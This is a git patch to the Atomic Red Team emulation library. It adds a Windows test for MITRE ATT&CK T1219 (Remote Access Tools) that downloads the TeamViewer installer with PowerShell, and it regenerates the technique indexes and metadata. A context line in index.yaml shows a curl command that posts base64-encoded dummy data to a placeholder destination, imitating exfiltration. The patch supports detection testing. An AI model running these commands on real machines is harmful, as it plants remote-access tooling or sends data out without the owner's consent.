From fbc458a342e2e7d9d47ee9dec78487378b7bf192 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 27 Feb 2020 18:04:44 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1219/T1219.md           |  34 ++++++++
 atomics/art_navigator_layer.json |   2 +-
 atomics/index.md                 |   3 +-
 atomics/index.yaml               | 141 +++++++++++++++++++++++--------
 atomics/linux-index.md           |   2 +-
 atomics/linux-matrix.md          |   2 +-
 atomics/macos-index.md           |   2 +-
 atomics/macos-matrix.md          |   2 +-
 atomics/matrix.md                |   2 +-
 atomics/windows-index.md         |   3 +-
 atomics/windows-matrix.md        |   2 +-
 11 files changed, 149 insertions(+), 46 deletions(-)
 create mode 100644 atomics/T1219/T1219.md

diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
new file mode 100644
index 00000000..468bb440
--- /dev/null
+++ b/atomics/T1219/T1219.md
@@ -0,0 +1,34 @@
+# T1219 - Remote Access Tools
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1219)
+<blockquote>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
+
+Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - TeamViewer Files Detected Test on Windows](#atomic-test-1---teamviewer-files-detected-test-on-windows)
+
+
+<br/>
+
+## Atomic Test #1 - TeamViewer Files Detected Test on Windows
+An adversary may attempt to trick the user into downloading teamviewer and using  this to maintain access to the machine. 
+
+**Supported Platforms:** Windows
+
+
+
+#### Attack Commands: Run with `powershell`! 
+```
+$client = new-object System.Net.WebClient
+$client.DownloadFile("https://download.teamviewer.com/download/TeamViewer_Setup.exe","C:\tmp\teamviewer.exe")
+```
+
+
+
+
+
+
+<br/>
diff --git a/atomics/art_navigator_layer.json b/atomics/art_navigator_layer.json
index a29e55bd..311736cf 100644
--- a/atomics/art_navigator_layer.json
+++ b/atomics/art_navigator_layer.json
@@ -1 +1 @@
-{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1004","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1015","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1023","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1028","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1031","score":100,"enabled":true},{"techniqueID":"T1032","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1035","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1038","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1042","score":100,"enabled":true},{"techniqueID":"T1044","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1050","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1058","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1060","score":100,"enabled":true},{"techniqueID":"T1062","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1073","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1075","score":100,"enabled":true},{"techniqueID":"T1076","score":100,"enabled":true},{"techniqueID":"T1077","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1084","score":100,"enabled":true},{"techniqueID":"T1085","score":100,"enabled":true},{"techniqueID":"T1086","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1088","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1093","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1096","score":100,"enabled":true},{"techniqueID":"T1097","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1100","score":100,"enabled":true},{"techniqueID":"T1101","score":100,"enabled":true},{"techniqueID":"T1102","score":100,"enabled":true},{"techniqueID":"T1103","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1117","score":100,"enabled":true},{"techniqueID":"T1118","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1121","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1126","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1128","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1138","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1143","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1170","score":100,"enabled":true},{"techniqueID":"T1173","score":100,"enabled":true},{"techniqueID":"T1174","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1179","score":100,"enabled":true},{"techniqueID":"T1180","score":100,"enabled":true},{"techniqueID":"T1183","score":100,"enabled":true},{"techniqueID":"T1191","score":100,"enabled":true},{"techniqueID":"T1193","score":100,"enabled":true},{"techniqueID":"T1196","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1208","score":100,"enabled":true},{"techniqueID":"T1214","score":100,"enabled":true},{"techniqueID":"T1215","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1223","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1500","score":100,"enabled":true},{"techniqueID":"T1501","score":100,"enabled":true},{"techniqueID":"T1502","score":100,"enabled":true},{"techniqueID":"T1504","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1004","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1015","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1023","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1028","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1031","score":100,"enabled":true},{"techniqueID":"T1032","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1035","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1038","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1042","score":100,"enabled":true},{"techniqueID":"T1044","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1050","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1058","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1060","score":100,"enabled":true},{"techniqueID":"T1062","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1073","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1075","score":100,"enabled":true},{"techniqueID":"T1076","score":100,"enabled":true},{"techniqueID":"T1077","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1084","score":100,"enabled":true},{"techniqueID":"T1085","score":100,"enabled":true},{"techniqueID":"T1086","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1088","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1093","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1096","score":100,"enabled":true},{"techniqueID":"T1097","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1100","score":100,"enabled":true},{"techniqueID":"T1101","score":100,"enabled":true},{"techniqueID":"T1102","score":100,"enabled":true},{"techniqueID":"T1103","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1117","score":100,"enabled":true},{"techniqueID":"T1118","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1121","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1126","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1128","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1138","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1143","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1170","score":100,"enabled":true},{"techniqueID":"T1173","score":100,"enabled":true},{"techniqueID":"T1174","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1179","score":100,"enabled":true},{"techniqueID":"T1180","score":100,"enabled":true},{"techniqueID":"T1183","score":100,"enabled":true},{"techniqueID":"T1191","score":100,"enabled":true},{"techniqueID":"T1193","score":100,"enabled":true},{"techniqueID":"T1196","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1208","score":100,"enabled":true},{"techniqueID":"T1214","score":100,"enabled":true},{"techniqueID":"T1215","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1223","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1500","score":100,"enabled":true},{"techniqueID":"T1501","score":100,"enabled":true},{"techniqueID":"T1502","score":100,"enabled":true},{"techniqueID":"T1504","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/index.md b/atomics/index.md
index 7eba821a..8cf4622c 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -953,7 +953,8 @@
 - T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1219 Remote Access Tools](./T1219/T1219.md)
+  - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
 - [T1105 Remote File Copy](./T1105/T1105.md)
   - Atomic Test #1: rsync remote file copy (push) [linux, macos]
   - Atomic Test #2: rsync remote file copy (pull) [linux, macos]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index ed5b577c..b39f6aee 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -26860,59 +26860,57 @@ command-and-control:
   '':
     technique:
       x_mitre_data_sources:
-      - Network intrusion detection system
-      - Network protocol analysis
-      - Process use of network
-      - Process monitoring
+      - Packet capture
+      - Netflow/Enclave netflow
       x_mitre_permissions_required:
       - User
-      name: Remote Access Tools
-      description: |-
-        An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
-        Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
-
-        Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)
-      id: attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7
-      x_mitre_contributors:
-      - Matt Kelly, @breakersall
+      name: Port Knocking
+      description: "Port Knocking is a well-established method used by both defenders
+        and adversaries to hide open ports from access. To enable a port, an adversary
+        sends a series of packets with certain characteristics before the port will
+        be opened. Usually this series of packets consists of attempted connections
+        to a predefined sequence of closed ports, but can involve unusual flags, specific
+        strings or other unique characteristics. After the sequence is completed,
+        opening a port is often accomplished by the host based firewall, but could
+        also be implemented by custom software. \n\nThis technique has been observed
+        to both for the dynamic opening of a listening port as well as the initiating
+        of a connection to a listening server on a different system.\n\nThe observation
+        of the signal packets to trigger the communication can be conducted through
+        different methods. One means, originally implemented by Cd00r (Citation: Hartrell
+        cd00r 2002), is to use the libpcap libraries to sniff for the packets in question.
+        Another method leverages raw sockets, which enables the malware to use ports
+        that are already open for use by other programs."
+      id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
+      modified: '2019-07-18T17:11:15.521Z'
       x_mitre_platforms:
       - Linux
-      - Windows
       - macOS
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       type: attack-pattern
-      x_mitre_detection: |-
-        Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
-
-        Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
-
-        [Domain Fronting](https://attack.mitre.org/techniques/T1172) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.
+      x_mitre_detection: Record network packets sent to and from the system, looking
+        for extraneous packets that do not belong to established flows.
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_network_requirements: true
       created: '2018-04-18T17:59:24.739Z'
       kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
       external_references:
-      - external_id: T1219
+      - external_id: T1205
         source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1219
-      - source_name: Symantec Living off the Land
-        description: Wueest, C., Anand, H. (2017, July). Living off the land and fileless
-          attack techniques. Retrieved April 10, 2018.
-        url: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
-      - source_name: CrowdStrike 2015 Global Threat Report
-        description: CrowdStrike Intelligence. (2016). 2015 Global Threat Report.
-          Retrieved April 11, 2018.
-        url: https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf
-      - source_name: CrySyS Blog TeamSpy
-        description: CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’
-          tolko s razreshenija S-a. Retrieved April 11, 2018.
-        url: https://blog.crysys.hu/2013/03/teamspy/
-      modified: '2019-07-18T17:42:08.766Z'
+        url: https://attack.mitre.org/techniques/T1205
+      - source_name: Hartrell cd00r 2002
+        description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
+          backdoor. Retrieved October 13, 2018.'
+        url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
+      x_mitre_defense_bypassed:
+      - Defensive network service scanning
     atomic_tests: []
   T1090:
     technique:
@@ -27104,6 +27102,75 @@ command-and-control:
         command: |
           echo -n 111-11-1111 | base64
           curl -XPOST #{base64_data}.#{destination_url}
+  T1219:
+    technique:
+      x_mitre_data_sources:
+      - Network intrusion detection system
+      - Network protocol analysis
+      - Process use of network
+      - Process monitoring
+      x_mitre_permissions_required:
+      - User
+      name: Remote Access Tools
+      description: |-
+        An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+        Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
+
+        Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)
+      id: attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7
+      x_mitre_contributors:
+      - Matt Kelly, @breakersall
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.0'
+      type: attack-pattern
+      x_mitre_detection: |-
+        Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
+
+        Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
+
+        [Domain Fronting](https://attack.mitre.org/techniques/T1172) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_network_requirements: true
+      created: '2018-04-18T17:59:24.739Z'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      external_references:
+      - external_id: T1219
+        source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1219
+      - source_name: Symantec Living off the Land
+        description: Wueest, C., Anand, H. (2017, July). Living off the land and fileless
+          attack techniques. Retrieved April 10, 2018.
+        url: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
+      - source_name: CrowdStrike 2015 Global Threat Report
+        description: CrowdStrike Intelligence. (2016). 2015 Global Threat Report.
+          Retrieved April 11, 2018.
+        url: https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf
+      - source_name: CrySyS Blog TeamSpy
+        description: CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’
+          tolko s razreshenija S-a. Retrieved April 11, 2018.
+        url: https://blog.crysys.hu/2013/03/teamspy/
+      modified: '2019-07-18T17:42:08.766Z'
+      identifier: T1219
+    atomic_tests:
+    - name: TeamViewer Files Detected Test on Windows
+      description: "An adversary may attempt to trick the user into downloading teamviewer
+        and using  this to maintain access to the machine. \n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $client = new-object System.Net.WebClient
+          $client.DownloadFile("https://download.teamviewer.com/download/TeamViewer_Setup.exe","C:\tmp\teamviewer.exe")
   T1105:
     technique:
       x_mitre_data_sources:
diff --git a/atomics/linux-index.md b/atomics/linux-index.md
index 4a5c9349..b44b2e0f 100644
--- a/atomics/linux-index.md
+++ b/atomics/linux-index.md
@@ -298,7 +298,7 @@
 - T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1219 Remote Access Tools](./T1219/T1219.md)
 - [T1105 Remote File Copy](./T1105/T1105.md)
   - Atomic Test #1: rsync remote file copy (push) [linux, macos]
   - Atomic Test #2: rsync remote file copy (pull) [linux, macos]
diff --git a/atomics/linux-matrix.md b/atomics/linux-matrix.md
index 08cbe1e9..ed2e8339 100644
--- a/atomics/linux-matrix.md
+++ b/atomics/linux-matrix.md
@@ -16,7 +16,7 @@
 |  |  | [Server Software Component](./T1505/T1505.md) |  | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](./T1518/T1518.md) |  |  |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Setuid and Setgid](./T1166/T1166.md) |  | [Indicator Removal on Host](./T1070/T1070.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) |  |  |  | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Systemd Service](./T1501/T1501.md) |  | [Install Root Certificate](./T1130/T1130.md) |  | [System Network Configuration Discovery](./T1016/T1016.md) |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
